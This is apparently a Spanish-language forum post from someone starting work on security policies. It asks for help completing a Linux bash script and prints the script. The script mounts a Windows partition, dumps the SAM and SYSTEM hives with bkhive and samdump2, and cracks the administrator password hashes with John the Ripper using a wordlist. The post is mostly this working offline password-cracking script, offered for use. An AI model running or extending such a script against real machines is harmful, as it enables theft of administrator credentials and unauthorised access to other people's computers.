Hola, en este momento estoy empezando a trabajar en politicas de seguridad, y estoy quedado porque tengo que hacer un script en linux para poder obtener claves de administrador de los Pc's, y la verdad no se por donde empezar, lo unico que tengo es lo siguiente:
HDAX="sda1"
DIR="WINDOWS"
echo "Inciciando el proceso de CRACKING!!!"
echo ""
echo "Montando la particion /dev/$HDAX..."
echo ""
mount /dev/$HDAX
echo "Ejecutando el comando bkhive..."
echo ""
bkhive /mnt/$HDAX/$DIR/system32/config/system syskey.txt
echo "Ejecutando samdump2-linux..."
echo ""
samdump2 /mnt/$HDAX/$DIR/system32/config/SAM syskey.txt > pass_hash.txt
echo "Descomprimiendo el diccionario que esta en el Live-cd ..."
echo ""
gunzip -c /pentest/password/dictionaries/wordlist.txt.Z > spa.txt
echo "Ejecutando John the Ripper..."
echo ""
/pentest/password/john-1.7.2/run/john pass_hash.txt -w:spa.txt
/pentest/password/john-1.7.2/run/john pass_hash.txt -i
/pentest/password/john-1.7.2/run/john pass_hash.txt -f:NT -w:spa.txt
/pentest/password/john-1.7.2/run/john -f:NT -show pass_hash.txt
Este codigo si funciona, claro que con ayuda de otros programas como jhon the pipper
espero me puedan ayudar a completar el codigo, queremos que el proceso se haga directamente